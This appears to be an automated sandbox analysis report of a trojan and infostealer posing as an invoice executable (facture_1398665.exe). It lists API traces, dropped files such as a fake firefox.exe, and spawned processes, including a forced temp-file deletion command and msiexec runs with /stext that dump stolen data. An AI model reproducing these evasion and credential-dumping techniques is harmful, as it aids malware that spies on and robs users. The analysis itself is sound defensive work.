Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_004AD294 FindFirstFileW,GetLastError,3_1_004AD294
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0FF154 _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,4_2_6E0FF154
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0FF033 _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,4_2_6E0FF033
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0FF27E _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,4_2_6E0FF27E
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0FEF1D _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,4_2_6E0FEF1D
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E109748 _mbsdec_l,memset,FindFirstFileExA,FindClose,FindNextFileA,qsort,4_2_6E109748
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E1098CF memset,FindFirstFileExW,FindClose,FindNextFileW,qsort,4_2_6E1098CF
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697C98CF memset,FindFirstFileExW,FindClose,FindNextFileW,qsort,5_2_697C98CF
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697BEF1D _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,5_2_697BEF1D
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697C9748 _mbsdec_l,memset,FindFirstFileExA,FindClose,FindNextFileA,qsort,5_2_697C9748
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697BF27E _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,5_2_697BF27E
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 6_2_00383836 SHGetFolderPathA,lstrcat,FindFirstFileA,lstrcmp,lstrcmp,lstrcpy,lstrlen,lstrcat,lstrcat,SHFileOperation,FindNextFileA,SHGetFolderPathA,lstrcat,FindFirstFileA,lstrcmp,lstrcmp,lstrcpy,lstrlen,lstrcat,lstrcpy,lstrcat,DeleteFileA,lstrcpy,lstrcat,CreateFileA,GetFileSize,ReadFile,lstrcat,lstrcat,StrStrA,lstrlen,WriteFile,lstrlen,WriteFile,??3@YAXPAX@Z,CloseHandle,FindNextFileA,6_2_00383836
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 6_2_0038364C SHGetFolderPathA,lstrcat,FindFirstFileA,lstrcmp,lstrcmp,lstrcpy,lstrlen,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcat,SHFileOperation,DeleteFileA,FindNextFileA,6_2_0038364C
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 6_2_00382F10 lstrcpy,lstrcat,CreateDirectoryA,GetLastError,FindFirstFileA,lstrcpy,lstrcat,lstrcat,lstrcpy,lstrcat,lstrcat,lstrcmp,lstrcmp,CreateDirectoryA,GetLastError,CopyFileA,FindNextFileA,6_2_00382F10

System Summary:

barindex
Contains functionality to communicate with device driversShow sources
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004808CC: CreateFileW,DeviceIoControl,GetLastError,CloseHandle,SetLastError,3_2_004808CC
Contains functionality to launch a process as a different userShow sources
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_01373985 _wcsdup,_wcsdup,free,_wcsdup,CreateProcessAsUserW,GetLastError,AssignProcessToJobObject,GetLastError,TerminateProcess,SetThreadToken,GetLastError,TerminateProcess,GetLastError,TerminateProcess,GetLastError,TerminateProcess,free,4_2_01373985
Contains functionality to shutdown / reboot the systemShow sources
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_0040E538 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,2_2_0040E538
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_0040E538 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,2_1_0040E538
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004B00AC GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,3_2_004B00AC
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_004B00AC GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,3_1_004B00AC
Creates mutexesShow sources
Source: C:\Windows\System32\dllhost.exeMutant created: \Sessions\1\BaseNamedObjects\F48A04623C4E0000
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_0040D33C2_2_0040D33C
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_00411F582_2_00411F58
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_004022602_2_00402260
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_0041259C2_2_0041259C
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_00411F5C2_2_00411F5C
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_0040D33C2_1_0040D33C
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_00411F582_1_00411F58
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_004022602_1_00402260
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_0041259C2_1_0041259C
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_00411F5C2_1_00411F5C
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004E22843_2_004E2284
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004E2D993_2_004E2D99
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004736F83_2_004736F8
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004CF4403_2_004CF440
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_0044A72C3_2_0044A72C
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004EB2B03_2_004EB2B0
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_00481C843_2_00481C84
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004AC17C3_2_004AC17C
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004535D03_2_004535D0
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_0049E1183_2_0049E118
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004077F83_2_004077F8
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004E6F443_2_004E6F44
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004FCA0C3_2_004FCA0C
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004F23883_2_004F2388
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004C6BD43_2_004C6BD4
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004024743_2_00402474
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004EA1FC3_2_004EA1FC
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004BB20C3_2_004BB20C
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_00488C403_2_00488C40
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_004E22843_1_004E2284
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_004E2D993_1_004E2D99
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_004736F83_1_004736F8
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_004CF4403_1_004CF440
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_0044A72C3_1_0044A72C
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_004EB2B03_1_004EB2B0
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_00481C843_1_00481C84
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_013515504_2_01351550
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_013536A04_2_013536A0
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_013523A04_2_013523A0
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_013527204_2_01352720
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_01353C204_2_01353C20
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_0136CA234_2_0136CA23
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_013549804_2_01354980
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_0136EE4C4_2_0136EE4C
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0D87004_2_6E0D8700
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0D6AB04_2_6E0D6AB0
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0C75504_2_6E0C7550
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0C31D04_2_6E0C31D0
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0CD4E24_2_6E0CD4E2
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0B7F604_2_6E0B7F60
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0D77704_2_6E0D7770
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0A97BB4_2_6E0A97BB
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0A763C4_2_6E0A763C
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E125ACE4_2_6E125ACE
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E13F9734_2_6E13F973
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0A84AF4_2_6E0A84AF
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E12B7C04_2_6E12B7C0
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0D19304_2_6E0D1930
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0B33704_2_6E0B3370
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0C6A394_2_6E0C6A39
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0D66D04_2_6E0D66D0
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0D19F04_2_6E0D19F0
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0CBE144_2_6E0CBE14
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0D9FE04_2_6E0D9FE0
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_00FA15505_2_00FA1550
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_00FA36A05_2_00FA36A0
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_00FBEE4C5_2_00FBEE4C
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_00FA49805_2_00FA4980
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_00FA23A05_2_00FA23A0
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_00FA27205_2_00FA2720
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_00FA3C205_2_00FA3C20
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_00FBCA235_2_00FBCA23
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697733705_2_69773370
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697831D05_2_697831D0
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697919305_2_69791930
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_69782C8E5_2_69782C8E
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697BADC95_2_697BADC9
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_69799FE05_2_69799FE0
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_6978BE145_2_6978BE14
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697966D05_2_697966D0
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697919F05_2_697919F0
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697697BB5_2_697697BB
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_6979A6A05_2_6979A6A0
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_69767ACD5_2_69767ACD
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_69796AB05_2_69796AB0
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697875505_2_69787550
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697FF9735_2_697FF973
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_69777F605_2_69777F60
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697FF5405_2_697FF540
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_6977B56A5_2_6977B56A
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_6976763C5_2_6976763C
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_69779D005_2_69779D00
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697977705_2_69797770
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 6_2_0038A1996_2_0038A199
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: String function: 6E0D56D0 appears 250 times
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: String function: 6E0B5E30 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: String function: 6E0B0FF0 appears 215 times
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: String function: 00404C88 appears 72 times
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: String function: 69775E30 appears 42 times
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: String function: 69770FF0 appears 275 times
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: String function: 69795730 appears 34 times
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: String function: 00382481 appears 313 times
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: String function: 697956D0 appears 297 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: String function: 00406914 appears 89 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: String function: 0049EE30 appears 69 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: String function: 00409620 appears 203 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: String function: 0040C24C appears 81 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: String function: 00487C88 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: String function: 00406448 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: String function: 004155D4 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: String function: 0040E258 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: String function: 004ADAE0 appears 96 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: String function: 004B2E4C appears 103 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: String function: 00409600 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: String function: 00406438 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: String function: 004B2BC8 appears 177 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: String function: 00405A34 appears 272 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: String function: 0049EB4C appears 47 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: String function: 004064D4 appears 31 times
PE file contains executable resources (Code or Archives)Show sources
Source: facture_1398665.tmp.2.drStatic PE information: Resource name: RT_STRING type: ump; Hitachi SH big-endian COFF object, not stripped
Source: facture_1398665.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: ump; PE32+ executable for MS Windows (console) Mono/.Net assembly
Source: facture_1398665.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: ump; PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
PE file contains strange resourcesShow sources
Source: facture_1398665.exeStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: facture_1398665.exeStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: facture_1398665.tmp.2.drStatic PE information: Resource name: RT_BITMAP type: ump; GLS_BINARY_LSB_FIRST
Source: facture_1398665.tmp.2.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: facture_1398665.tmp.2.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
PE file does not import any functionsShow sources
Source: is-IEU03.tmp.3.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
Source: is-HRJGD.tmp.3.drStatic PE information: No import functions for PE file found
Source: is-NOVNE.tmp.3.drStatic PE information: No import functions for PE file found
Reads the hosts fileShow sources
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\dllhost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\dllhost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample file is different than original file name gathered from version infoShow sources
Source: facture_1398665.exe, 00000002.00000002.12842058384.001F0000.00000002.sdmpBinary or memory string: OriginalFilenamenetmsg.DLLj% vs facture_1398665.exe
Source: facture_1398665.exe, 00000002.00000002.12842575558.01290000.00000008.sdmpBinary or memory string: OriginalFilenameKernelbasej% vs facture_1398665.exe
Source: facture_1398665.exe, 00000002.00000002.12843282025.01350000.00000008.sdmpBinary or memory string: OriginalFilenamenetmsg.DLL.MUIj% vs facture_1398665.exe
Source: facture_1398665.exe, 00000002.00000003.12809044783.01380000.00000004.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs facture_1398665.exe
Sample reads its own file contentShow sources
Source: C:\Users\user\Desktop\facture_1398665.exeFile read: C:\Users\user\Desktop\facture_1398665.exeJump to behavior
Binary contains device paths (device paths are often used for kernel mode <-> user mode communication)Show sources
Source: firefox.exe.4.drBinary string: r@P\FLASHTMP.TMPvector<T> too longBLOCKEDBroker ALLOWEDNtQuerySectionntdll.dllz:\build\build\src\security\sandbox\chromium\base/numerics/safe_math.hmap/set<T> too longz:/build/build/src/security/sandbox/chromium/base/threading/thread_local_storage.cckernel32.dllInitializeProcThreadAttributeListUpdateProcThreadAttributeDeleteProcThreadAttributeListGetProductInfoIsWow64Processz:/build/build/src/security/sandbox/chromium/sandbox/win/src/broker_services.cc_TargetNtCreateFile@48NtCreateFile_TargetNtOpenFile@28NtOpenFile_TargetNtQueryAttributesFile@12NtQueryAttributesFile_TargetNtQueryFullAttributesFile@12NtQueryFullAttributesFile_TargetNtSetInformationFile@24NtSetInformationFilentdll.dll*\/?/?\*\/?/?\*~*\Device\\??\g_handles_to_closeKeyNtQueryObjectFileEventz:/build/build/src/security/sandbox/chromium/sandbox/win/src/handle_closer_agent.ccALPC PortDuplicateHandlesize <= kAllocGranularityg_interceptionsz:/build/build/src/security/sandbox/chromium/sandbox/win/src/interception.cc_TargetNtMapViewOfSection@44_TargetNtUn
Source: firefox.exe.4.drBinary string: \??\\Device\ntdll.dlldependentlibs.list.gtest
Classification labelShow sources
Source: classification engineClassification label: mal100.evad.phis.spyw.troj.winEXE@17/110@2/1
Contains functionality for error loggingShow sources
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004328A4 GetLastError,FormatMessageW,3_2_004328A4
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_0040E538 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,2_2_0040E538
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_0040E538 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,2_1_0040E538
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004B00AC GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,3_2_004B00AC
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_004B00AC GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,3_1_004B00AC
Contains functionality to check free disk spaceShow sources
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_0040805C GetDiskFreeSpaceW,2_2_0040805C
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004CC238 GetVersion,CoCreateInstance,3_2_004CC238
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_0040EE14 FindResourceW,SizeofResource,LoadResource,LockResource,2_2_0040EE14
Creates files inside the user directoryShow sources
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
Creates temporary filesShow sources
Source: C:\Users\user\Desktop\facture_1398665.exeFile created: C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmpJump to behavior
Found command line outputShow sources
Source: C:\Windows\System32\cmd.exeConsole Write: .........'.@......... ....'.l.'.E..J.........'.@....@F.J. ....'.......>.V..J..>.......>...'.......Fu....t...`.....,.....Jump to behavior
Parts of this applications are using Borland Delphi (Probably coded in Delphi)Show sources
Source: C:\Users\user\Desktop\facture_1398665.exeKey opened: HKEY_USERS\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpKey opened: HKEY_USERS\Software\Borland\Delphi\LocalesJump to behavior
Queries a list of all open handlesShow sources
Source: C:\Windows\System32\msiexec.exeSystem information queried: HandleInformationJump to behavior
Reads ini filesShow sources
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\facture_1398665.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the Windows registered organization settingsShow sources
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\facture_1398665.exe 'C:\Users\user\Desktop\facture_1398665.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp 'C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp' /SL5='$7016C,1728489,170496,C:\Users\user\Desktop\facture_1398665.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe 'C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe'
Source: unknownProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\dllhost.exe
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c del /f /q %temp%\gif*
Source: unknownProcess created: C:\Windows\System32\msiexec.exe '' /stext 'C:\Users\user~1\AppData\Local\Temp\_pE740.tmp'
Source: unknownProcess created: C:\Windows\System32\msiexec.exe '' /stext 'C:\Users\user~1\AppData\Local\Temp\_pE73F.tmp'
Source: C:\Users\user\Desktop\facture_1398665.exeProcess created: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp 'C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp' /SL5='$7016C,1728489,170496,C:\Users\user\Desktop\facture_1398665.exe' Jump to behavior
